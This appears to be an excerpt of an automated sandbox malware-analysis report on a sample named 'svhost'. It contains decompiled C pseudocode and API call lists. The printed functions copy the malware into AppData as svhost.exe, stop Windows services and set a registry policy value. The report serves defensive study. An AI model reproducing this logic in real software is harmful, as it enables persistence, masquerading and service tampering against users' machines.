                                      0x00e6f131
                                      0x00e6f131
                                      0x00e6f138
                                      0x00000000
                                      0x00e6f032
                                      0x00000000
                                      0x00e6f011
                                      0x00000000
                                      0x00e6effa
                                      0x00000000
                                      0x00e6ef9c
                                      0x00e6f153
                                      0x00e6f156
                                      0x00e6f15e
                                      0x00e6f15f
                                      0x00e6f160
                                      0x00e6f16e

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00E6EFD3
                                      • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E6EFF0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountDependentEnumServicesTick
                                      • String ID: H$H
                                      • API String ID: 2646064813-2010421380
                                      • Opcode ID: c1b24a9a97dab8c8711eda85513393a7a94598a863fd3c70ee7554709ef61efc
                                      • Instruction ID: b7dc99222646b7b6ff79ec6bd3e42cf5935fdb68a4fa2507ef2653db12457009
                                      • Opcode Fuzzy Hash: c1b24a9a97dab8c8711eda85513393a7a94598a863fd3c70ee7554709ef61efc
                                      • Instruction Fuzzy Hash: 31516CB1E85208DFDB10CFE4E849BEEBBB4FB08384F10912AE516B7281D7759846CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00E63800(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                      				signed int _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v44;
                                      				char _v68;
                                      				char _v72;
                                      				intOrPtr _v76;
                                      				signed int _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				signed int _v92;
                                      				signed int _v96;
                                      				signed int _v100;
                                      				char _v104;
                                      				char _v116;
                                      				char _v128;
                                      				signed int _t98;
                                      				signed int _t99;
                                      				void* _t128;
                                      				signed int _t143;
                                      				void* _t146;
                                      				intOrPtr _t150;
                                      				signed int _t156;
                                      				intOrPtr _t169;
                                      				intOrPtr _t178;
                                      				intOrPtr _t189;
                                      				signed int _t197;
                                      				void* _t202;
                                      				void* _t203;
                                      				signed int _t204;
                                      
                                      				_t203 = __esi;
                                      				_t202 = __edi;
                                      				_t146 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0f10);
                                      				_push( *[fs:0x0]);
                                      				_t98 =  *0xeef074; // 0x221cac15
                                      				_t99 = _t98 ^ _t204;
                                      				_v20 = _t99;
                                      				_push(_t99);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v76 = __ecx;
                                      				_v80 = 0;
                                      				E00E636D0( &_v44);
                                      				_v8 = 0;
                                      				E00E636D0( &_v68);
                                      				_v8 = 1;
                                      				_v92 = _a8;
                                      				_t150 = _v76;
                                      				_t190 =  *(_t150 + 0x48) & 0x000000ff;
                                      				if(( *(_t150 + 0x48) & 0x000000ff) == 0) {
                                      					_v100 = 0;
                                      					_v96 = 0;
                                      					_t189 = _v76;
                                      					_t190 = _v100;
                                      					 *(_t189 + 0x40) = _v100;
                                      					 *((intOrPtr*)(_t189 + 0x44)) = _v96;
                                      				}
                                      				E00E640E0(_t146,  &_v44, _t202, _t203, 8, 0);
                                      				 *(_v76 + 0x4c) = 0;
                                      				while(_a8 != _a12) {
                                      					_v84 = E00E5A440(E00E643A0( &_v44,  &_v104));
                                      					_v88 = E00E61350( *((intOrPtr*)(_v76 + 4)), _v76 + 0x40, _a8, _a12,  &_a8, _v84, E00E57A20( &_v44) + _v84,  &_v72);
                                      					if(_v88 < 0) {
                                      						L22:
                                      						_t169 = _v76;
                                      						_t190 =  *(_t169 + 0x49) & 0x000000ff;
                                      						_t213 =  *(_t169 + 0x49) & 0x000000ff;
                                      						if(( *(_t169 + 0x49) & 0x000000ff) == 0) {
                                      							E00E60E80( &_v128, "bad conversion");
                                      							E00EA0C81( &_v128, 0xeedb3c);
                                      							goto L25;
                                      						} else {
                                      							E00E580A0(_t146, _a4, _t202, _t203, _t213, _v76 + 0x10);
                                      							_v80 = _v80 | 0x00000001;
                                      							_v8 = 0;
                                      							E00E57F50( &_v68);
                                      							_v8 = 0xffffffff;
                                      							E00E57F50( &_v44);
                                      						}
                                      					} else {
                                      						if(_v88 <= 1) {
                                      							__eflags = _v84 - _v72;
                                      							if(_v84 >= _v72) {
                                      								_t128 = E00E57A20( &_v44);
                                      								__eflags = _t128 - 0x10;
                                      								if(_t128 >= 0x10) {
                                      									_t178 = _v76;
                                      									_t190 =  *(_t178 + 0x49) & 0x000000ff;
                                      									__eflags =  *(_t178 + 0x49) & 0x000000ff;
                                      									if(__eflags == 0) {
                                      										E00E60E80( &_v116, "bad conversion");
                                      										E00EA0C81( &_v116, 0xeedb3c);
                                      										goto L16;
                                      									} else {
                                      										E00E580A0(_t146, _a4, _t202, _t203, __eflags, _v76 + 0x10);
                                      										_v80 = _v80 | 0x00000001;
                                      										_v8 = 0;
                                      										E00E57F50( &_v68);
                                      										_v8 = 0xffffffff;
                                      										E00E57F50( &_v44);
                                      									}
                                      								} else {
                                      									E00E640E0(_t146,  &_v44, _t202, _t203, 8, 0);
                                      									goto L16;
                                      								}
                                      							} else {
                                      								asm("lfence");
                                      								E00E598A0( &_v68, _t202, _t203, _v84, _v72 - _v84);
                                      								L16:
                                      								goto L25;
                                      							}
                                      						} else {
                                      							if(_v88 == 3) {
                                      								while(1) {
                                      									__eflags = _a8 - _a12;
                                      									if(_a8 == _a12) {
                                      										break;
                                      									}
                                      									E00E633C0(_t146,  &_v68, _t202, _t203,  *_a8 & 0x000000ff);
                                      									_t143 = _a8 + 2;
                                      									__eflags = _t143;
                                      									_a8 = _t143;
                                      								}
                                      								L25:
                                      								_t197 = _a8 - _v92;
                                      								__eflags = _t197;
                                      								_t190 = _t197 >> 1;
                                      								 *(_v76 + 0x4c) = _t197 >> 1;
                                      								continue;
                                      							} else {
                                      								goto L22;
                                      							}
                                      						}
                                      					}
                                      					L27:
                                      					 *[fs:0x0] = _v16;
                                      					return E00E89A35(_t146, _v20 ^ _t204, _t190, _t202, _t203);
                                      				}
                                      				E00E57F70(_a4,  &_v68);
                                      				_t156 = _v80 | 0x00000001;
                                      				__eflags = _t156;
                                      				_v80 = _t156;
                                      				_v8 = 0;
                                      				E00E57F50( &_v68);
                                      				_v8 = 0xffffffff;
                                      				E00E57F50( &_v44);
                                      				goto L27;
                                      			}

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$codecvt
                                      • String ID: bad conversion
                                      • API String ID: 882727733-2629740042
                                      • Opcode ID: dc15963f822a41aec350897b5aba4ed9121416ca2312d5dc164df7aa2ee232de
                                      • Instruction ID: ba50178927212bec6fef5a99646830d630e3ad088cda3c977a63ca731996749c
                                      • Opcode Fuzzy Hash: dc15963f822a41aec350897b5aba4ed9121416ca2312d5dc164df7aa2ee232de
                                      • Instruction Fuzzy Hash: C6818C31A44248DFCB08DFA4D891AEEBBB1FF44354F14951DE416BB285DB70AA0ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E00E6ED00(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, long _a8) {
                                      				signed int _v8;
                                      				short* _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				struct _SERVICE_STATUS _v48;
                                      				char _v49;
                                      				void* _v56;
                                      				long _v60;
                                      				void* _v64;
                                      				long _v68;
                                      				intOrPtr _v72;
                                      				signed int _t63;
                                      				short** _t74;
                                      				short** _t81;
                                      				short** _t86;
                                      				void* _t89;
                                      				void* _t111;
                                      				void* _t112;
                                      				signed int _t113;
                                      
                                      				_t112 = __esi;
                                      				_t111 = __edi;
                                      				_t89 = __ebx;
                                      				_t63 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t63 ^ _t113;
                                      				_v72 = __ecx;
                                      				_v49 = 0;
                                      				_v68 = GetTickCount();
                                      				if((E00E579A0(_a4) & 0x000000ff) != 0) {
                                      					L27:
                                      					return E00E89A35(_t89, _v8 ^ _t113, _t104, _t111, _t112);
                                      				}
                                      				_v64 = OpenSCManagerW(0, 0, 0xf003f);
                                      				if(_v64 == 0) {
                                      					goto L27;
                                      				}
                                      				_v56 = OpenServiceW(_v64, E00E57A40(), 0x2c);
                                      				if(_v56 == 0) {
                                      					L26:
                                      					CloseServiceHandle(_v64);
                                      					goto L27;
                                      				}
                                      				_v48 = 0;
                                      				_v44 = 0;
                                      				_v40 = 0;
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_t74 =  &_v12;
                                      				_t104 = _v56;
                                      				__imp__QueryServiceStatusEx(_v56, 0,  &_v48, 0x24, _t74);
                                      				if(_t74 == 0 || _v44 == 1) {
                                      					L25:
                                      					CloseServiceHandle(_v56);
                                      					goto L26;
                                      				} else {
                                      					while(_v44 == 3) {
                                      						_v60 = _v24 / 0xa;
                                      						if(_v60 >= 0x3e8) {
                                      							if(_v60 > 0x2710) {
                                      								_v60 = 0x2710;
                                      							}
                                      						} else {
                                      							_v60 = 0x3e8;
                                      						}
                                      						Sleep(_v60);
                                      						_t86 =  &_v12;
                                      						__imp__QueryServiceStatusEx(_v56, 0,  &_v48, 0x24, _t86);
                                      						if(_t86 != 0) {
                                      							if(_v44 != 1) {
                                      								if(GetTickCount() - _v68 <= _a8) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      						} else {
                                      						}
                                      						break;
                                      					}
                                      					_t104 = _v64;
                                      					E00E6EF60(_v72, _v64, _v64, _v56, _a8);
                                      					if(ControlService(_v56, 1,  &_v48) == 0) {
                                      						goto L25;
                                      					}
                                      					while(_v44 != 1) {
                                      						Sleep(_a8);
                                      						_t81 =  &_v12;
                                      						_t104 = _v56;
                                      						__imp__QueryServiceStatusEx(_v56, 0,  &_v48, 0x24, _t81);
                                      						if(_t81 == 0) {
                                      							L24:
                                      							continue;
                                      						}
                                      						if(_v44 != 1) {
                                      							if(GetTickCount() - _v68 <= _a8) {
                                      								goto L24;
                                      							}
                                      							goto L25;
                                      						}
                                      						_v49 = 1;
                                      						goto L25;
                                      					}
                                      					goto L25;
                                      				}
                                      			}

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00E6ED17
                                      • std::ios_base::good.LIBCPMTD ref: 00E6ED23
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00E6ED3C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,0000002C), ref: 00E6ED5E
                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 00E6EDA5
                                      • Sleep.KERNEL32(00002710), ref: 00E6EDF8
                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 00E6EE0E
                                      • GetTickCount.KERNEL32 ref: 00E6EE22
                                      • ControlService.ADVAPI32(00000000,00000001,?,00000000,00000000,?), ref: 00E6EE52
                                      • Sleep.KERNEL32(?), ref: 00E6EE66
                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 00E6EE7C
                                      • GetTickCount.KERNEL32 ref: 00E6EE92
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EEA8
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EEB2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CountQueryStatusTick$CloseHandleOpenSleep$ControlManagerstd::ios_base::good
                                      • String ID:
                                      • API String ID: 3349164940-0
                                      • Opcode ID: 6c9749ca940ce5f0cb3db6f82d0b0790793c915f457115bceba91ebb98880955
                                      • Instruction ID: 9c0677883d808b177eb619e54f38fd8084e9bc31f33b7ffa122c15e44227fb4e
                                      • Opcode Fuzzy Hash: 6c9749ca940ce5f0cb3db6f82d0b0790793c915f457115bceba91ebb98880955
                                      • Instruction Fuzzy Hash: 005171B4D40208EFDB14DFA9E989BEDBBB4AF48344F10902AF505B72D0D7329945CB22
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB8591(intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t25;
                                      				intOrPtr* _t26;
                                      				intOrPtr _t28;
                                      				intOrPtr* _t29;
                                      				intOrPtr* _t31;
                                      				intOrPtr* _t45;
                                      				intOrPtr* _t46;
                                      				intOrPtr* _t47;
                                      				intOrPtr* _t55;
                                      				intOrPtr* _t70;
                                      				intOrPtr _t74;
                                      
                                      				_t74 = _a4;
                                      				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                      				if(_t25 != 0 && _t25 != 0xeef250) {
                                      					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                      					if(_t45 != 0 &&  *_t45 == 0) {
                                      						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                      						if(_t46 != 0 &&  *_t46 == 0) {
                                      							E00EB051F(_t46);
                                      							E00EB783B( *((intOrPtr*)(_t74 + 0x88)));
                                      						}
                                      						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                      						if(_t47 != 0 &&  *_t47 == 0) {
                                      							E00EB051F(_t47);
                                      							E00EB7CF0( *((intOrPtr*)(_t74 + 0x88)));
                                      						}
                                      						E00EB051F( *((intOrPtr*)(_t74 + 0x7c)));
                                      						E00EB051F( *((intOrPtr*)(_t74 + 0x88)));
                                      					}
                                      				}
                                      				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                      				if(_t26 != 0 &&  *_t26 == 0) {
                                      					E00EB051F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                      					E00EB051F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                      					E00EB051F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                      					E00EB051F( *((intOrPtr*)(_t74 + 0x8c)));
                                      				}
                                      				E00EB8702( *((intOrPtr*)(_t74 + 0x9c)));
                                      				_t28 = 6;
                                      				_t55 = _t74 + 0xa0;
                                      				_v8 = _t28;
                                      				_t70 = _t74 + 0x28;
                                      				do {
                                      					if( *((intOrPtr*)(_t70 - 8)) != 0xeef388) {
                                      						_t31 =  *_t70;
                                      						if(_t31 != 0 &&  *_t31 == 0) {
                                      							E00EB051F(_t31);
                                      							E00EB051F( *_t55);
                                      						}
                                      						_t28 = _v8;
                                      					}
                                      					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                      						_t29 =  *((intOrPtr*)(_t70 - 4));
                                      						if(_t29 != 0 &&  *_t29 == 0) {
                                      							E00EB051F(_t29);
                                      						}
                                      						_t28 = _v8;
                                      					}
                                      					_t55 = _t55 + 4;
                                      					_t70 = _t70 + 0x10;
                                      					_t28 = _t28 - 1;
                                      					_v8 = _t28;
                                      				} while (_t28 != 0);
                                      				return E00EB051F(_t74);
                                      			}

                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00EB85D5
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB7858
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB786A
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB787C
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB788E
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78A0
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78B2
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78C4
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78D6
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78E8
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78FA
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB790C
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB791E
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB7930
                                      • _free.LIBCMT ref: 00EB85CA
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      • _free.LIBCMT ref: 00EB85EC
                                      • _free.LIBCMT ref: 00EB8601
                                      • _free.LIBCMT ref: 00EB860C
                                      • _free.LIBCMT ref: 00EB862E
                                      • _free.LIBCMT ref: 00EB8641
                                      • _free.LIBCMT ref: 00EB864F
                                      • _free.LIBCMT ref: 00EB865A
                                      • _free.LIBCMT ref: 00EB8692
                                      • _free.LIBCMT ref: 00EB8699
                                      • _free.LIBCMT ref: 00EB86B6
                                      • _free.LIBCMT ref: 00EB86CE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 70c6e60eec8ae7a5b1b9867070f2407dc3f47e72e21cf8462ac9b5e92e7911eb
                                      • Instruction ID: cb00d80d086d373362d19e21a0004707d4e6862889d6d18765ca58e89a21a395
                                      • Opcode Fuzzy Hash: 70c6e60eec8ae7a5b1b9867070f2407dc3f47e72e21cf8462ac9b5e92e7911eb
                                      • Instruction Fuzzy Hash: 3A3157716012059FEB31AA38DE45BDB77EAAF40314F106429E585FB696DF74ED80CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E00E70340(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v44;
                                      				char _v68;
                                      				intOrPtr _v72;
                                      				char _v96;
                                      				signed int _t30;
                                      				signed int _t31;
                                      				signed char _t37;
                                      				WCHAR* _t49;
                                      				signed int _t85;
                                      
                                      				_t84 = __esi;
                                      				_t83 = __edi;
                                      				_t57 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec1960);
                                      				_push( *[fs:0x0]);
                                      				_t30 =  *0xeef074; // 0x221cac15
                                      				_t31 = _t30 ^ _t85;
                                      				_v20 = _t31;
                                      				_push(_t31);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v72 = __ecx;
                                      				E00E57CD0(__ebx,  &_v96, __edi, __esi, __eflags, L"AppData");
                                      				E00E70540(__ebx, _v72, __edi, __esi,  &_v44,  &_v96);
                                      				E00E57B40( &_v96);
                                      				_t37 = E00E579A0( &_v44);
                                      				_t82 = _t37 & 0x000000ff;
                                      				_t90 = _t37 & 0x000000ff;
                                      				if((_t37 & 0x000000ff) != 0) {
                                      					L5:
                                      					E00E57CD0(_t57, _a4, _t83, _t84, __eflags, 0xee4df0);
                                      					E00E57B40( &_v44);
                                      				} else {
                                      					E00E70470(__ebx, _v72, _t82, __edi, __esi, _t90,  &_v68);
                                      					if((E00E579A0( &_v68) & 0x000000ff) != 0) {
                                      						L4:
                                      						E00E57B40( &_v68);
                                      						goto L5;
                                      					} else {
                                      						E00E66920( &_v44, "\\");
                                      						E00E66920( &_v44, L"svhost");
                                      						E00E66920( &_v44, L".exe");
                                      						_t49 = E00E57A40();
                                      						if(CopyFileW(E00E57A40(), _t49, 0) == 0) {
                                      							goto L4;
                                      						} else {
                                      							_t82 =  &_v44;
                                      							E00E57BA0(_a4, E00E51650( &_v44));
                                      							E00E57B40( &_v68);
                                      							E00E57B40( &_v44);
                                      						}
                                      					}
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t57, _v20 ^ _t85, _t82, _t83, _t84);
                                      			}


                                      APIs
                                        • Part of subcall function 00E70540: std::ios_base::good.LIBCPMTD ref: 00E7056E
                                        • Part of subcall function 00E70540: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,00000000,00000104,00000000,221CAC15,?,00EC0ED0,000000FF,?,00E70388,?,?,AppData,221CAC15), ref: 00E705A6
                                        • Part of subcall function 00E70540: task.LIBCPMTD ref: 00E705D5
                                      • task.LIBCPMTD ref: 00E7038B
                                      • std::ios_base::good.LIBCPMTD ref: 00E70393
                                      • task.LIBCPMTD ref: 00E70445
                                        • Part of subcall function 00E70470: GetModuleFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000104,00000000,221CAC15,00EC0ED0,000000FF,?,00E703AF,?,?,?,AppData,221CAC15), ref: 00E704C0
                                        • Part of subcall function 00E70470: task.LIBCPMTD ref: 00E704F8
                                      • std::ios_base::good.LIBCPMTD ref: 00E703B2
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,.exe,svhost,00EE4DD0,?,?,?,AppData,221CAC15), ref: 00E703F9
                                      • task.LIBCPMTD ref: 00E7041B
                                      • task.LIBCPMTD ref: 00E70423
                                      • task.LIBCPMTD ref: 00E70430
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$std::ios_base::good$File$CopyEnvironmentModuleNameVariable
                                      • String ID: .exe$AppData$svhost
                                      • API String ID: 1170940147-767749533
                                      • Opcode ID: f17c19aa269b4614edfc13f4c26996c7a71b6d13f58e78cc271297b4f3c1a569
                                      • Instruction ID: eb8a374d66f7dc9f78514c0dd9b3d53235420b40eb54e0d6a562956c6add631a
                                      • Opcode Fuzzy Hash: f17c19aa269b4614edfc13f4c26996c7a71b6d13f58e78cc271297b4f3c1a569
                                      • Instruction Fuzzy Hash: 01316071914148DBCB08EB91ECA2EEEB7B9EF54310F407529F85676191EF30AA49CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E55820(signed char _a4) {
                                      				signed int _v8;
                                      				char _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				long _v28;
                                      				signed int _t16;
                                      				void* _t28;
                                      				void* _t35;
                                      				void* _t36;
                                      				signed int _t37;
                                      
                                      				_t16 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t16 ^ _t37;
                                      				if((_a4 & 0x000000ff) == 0) {
                                      					_t34 =  &_v20;
                                      					_v28 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0xf003f,  &_v20);
                                      					if(_v28 == 0) {
                                      						RegDeleteValueW(_v20, L"EnableLinkedConnections");
                                      						RegCloseKey(_v20);
                                      					}
                                      				} else {
                                      					_v24 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0xf003f,  &_v16);
                                      					if(_v24 == 0) {
                                      						_v12 = 1;
                                      						_t34 =  &_v12;
                                      						RegSetValueExW(_v16, L"EnableLinkedConnections", 0, 4,  &_v12, 4);
                                      						RegCloseKey(_v16);
                                      					}
                                      				}
                                      				return E00E89A35(_t28, _v8 ^ _t37, _t34, _t35, _t36);
                                      			}

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,000F003F,?), ref: 00E5584D
                                      • RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 00E55876
                                      • RegCloseKey.ADVAPI32(?), ref: 00E55880
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,000F003F,?), ref: 00E5589D
                                      • RegDeleteValueW.ADVAPI32(?,EnableLinkedConnections), ref: 00E558B5
                                      • RegCloseKey.ADVAPI32(?), ref: 00E558BF
                                      Strings
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E55843
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E55893
                                      • EnableLinkedConnections, xrefs: 00E558AC
                                      • EnableLinkedConnections, xrefs: 00E5586D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                       • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenValue$Delete
